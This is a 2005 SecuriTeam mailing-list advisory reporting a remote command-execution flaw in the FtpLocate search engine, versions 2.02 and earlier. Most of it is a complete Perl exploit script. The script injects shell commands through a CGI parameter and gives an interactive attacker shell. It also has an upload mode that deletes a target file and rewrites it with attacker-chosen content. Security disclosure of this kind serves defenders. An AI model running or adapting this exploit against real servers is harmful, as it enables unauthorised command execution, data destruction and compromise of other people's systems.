[EXPL] FtpLocate Command Execution (Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 07/27/05

  • Next message: SecuriTeam: "[EXPL] SlimFTPd Buffer Overflow (LIST)" 
    To: list@securiteam.com
Date: 27 Jul 2005 14:34:52 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      FtpLocate Command Execution (Exploit)
    ------------------------------------------------------------------------

    SUMMARY

     <http://turtle.ee.ncku.edu.tw/ftplocate/readme.english.html> FtpLocate -
    "a fast and free FTP search engine with source available for download."

    FtpLocate has been found to be vulnerable to a command execution
    vulnerability that allows remote attackers to run malicious code on
    vulnerable system.

    DETAILS

    Vulnerable Systems:
     * FtpLocate version 2.02 and prior

    Exploit:
    #!/usr/bin/perl
    #
    # FtpLocate <= 2.02 (current) remote exploit
    # VERY PRIVATE VERSION
    # DO NOT DISTRIBUTE
    #
    # newbug Tseng [at] chroot.org
    #

    sub my_socket
    {
        my $s=IO::Socket::INET->new(PeerAddr => $host,
                    PeerPort => 80,
                    Proto => "tcp") or die "socket: ";
    }
    sub ch2hex
    {
        $chr = $_[0];
        $out="";
        for($i=0;$i<length($chr);$i++)
        {
            $ch = substr($chr,$i,1);

            if($ch eq "\"")
            {
                $out.="%5c%22";
            }

            elsif($ch eq "\$")
            {
                $out.="%5c%24";
            }
            elsif($ch eq "\@")
            {
                $out.="%5c%40";
            }
            else
            {
                $out.="%".sprintf("%2.2x",ord($ch));
            }
        }
        $out;
    }
    sub upload_file
    {
        print "local file: ";
        chomp($lfile = <STDIN>);
        print "remote file: ";
        chomp($rfile = <STDIN>);

        my $socket = &my_socket($host);
        print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
        close $socket;
        print "remove $host:$rfile done.\n";

        my @DATA = `cat $lfile`;
        $num=1;
        $total = scalar @DATA;
        foreach $DATA (@DATA)
        {
            $DATA = &ch2hex($DATA);
            my $socket = &my_socket($host);
            print $socket "GET
    $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>$rfile| $junk";
            print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n";
            sleep(1);
            close $socket;
            $num++;
        }
    }
    use IO::Socket::INET;

    print "FtpLocate flsearch.pl remote exploit\n";
    print "host: ";
    chomp ($host = <STDIN>);
    print "port (80): ";
    chomp ($port = <STDIN>);
    if($port eq "")
    {
        $port = 80;
    }
    print "version 1.0/1.1 (1.0): ";
    chomp ($ver = <STDIN>);
    if($ver eq "")
    {
        $ver = "1.0";
    }
    print "cmd/upload (cmd): "; chomp ($opt = <STDIN>);
    if($opt eq "") {
        $opt = "cmd";
    }
    print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
    chomp ($cgi = <STDIN>);
    if($cgi eq "")
    {
        $cgi = "/cgi-bin/ftplocate/flsearch.pl";
    }
    if($ver eq "1.0")
    {
        $junk = "HTTP/1.0\n\n";
    }
    else
    {
        $junk = "HTTP/1.1\n" . "Host: $host\n" . "User-Agent: Mozilla/5.0
    (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030624 Netscape/7.1" .
    "Accept:
    text/xml,application/xml,application/xhtml+xml,text/html;q=0.9;text/plain\n" . "Accept-Language: zh-tw,en-us;q=0.7,en;q=0.3" . "Accept-Encoding: gzip,deflate" . "Accept-Charset: Big5,utf-8;q=0.7,*;q=0.7" . "Keep-Alive:300" . "Connection: keep-alive\n" . "\n";
    }
    if ($opt eq "cmd")
    {
        while(1){
            print "h4ck3r\@[$host]:~\$ ";
            chomp ($cmd = <STDIN>);
            if($cmd ne "")
            {
                print "Send command \"$cmd\" to $host ...\n";
                $socket = &my_socket($host);
                $cmd =~ s/\s/%20/g;

                print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
                print "done.\n";
            }
        }
    }
    elsif($opt eq "upload")
    {
        &upload_file($lfile);
    }

    print "done.\n";

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:Tseng@chroot.org> Tseng.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] SlimFTPd Buffer Overflow (LIST)"

    Relevant Pages

    • [UNIX] MPlayer MMST and Real RTSP Multiple Heap Overflows
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... The second vulnerability is due to a heap overflow ... which may be exploited via a malicious server to ... cause a denial of service and potentially compromise a vulnerable system. ...
      (Securiteam)
    • [EXPL] FRB Remote Command Execution (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... attackers to execute arbitrary code on the vulnerable system, ... print $sock "Host: $host\n"; ...
      (Securiteam)
    • [NT] AVIRA Antivirus ACE Archive Handling Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... compromise a vulnerable system. ... Successful exploitation allows arbitrary code execution, ... The vendor has issue the following statement: ...
      (Securiteam)
    • [NT] HAURI Anti-Virus ALZ Archive Handling Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... compromise a vulnerable system. ... * HAURI LiveCall ... ViRobot Expert 4.0 / ViRobot Advanced Server: ...
      (Securiteam)
    • [NT] MailEnable POP Service "PASS" Command Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... MailEnable POP Service "PASS" Command Buffer Overflow ... be exploited by malicious people to compromise a vulnerable system. ... Successful exploitation allows execution of arbitrary code. ...
      (Securiteam)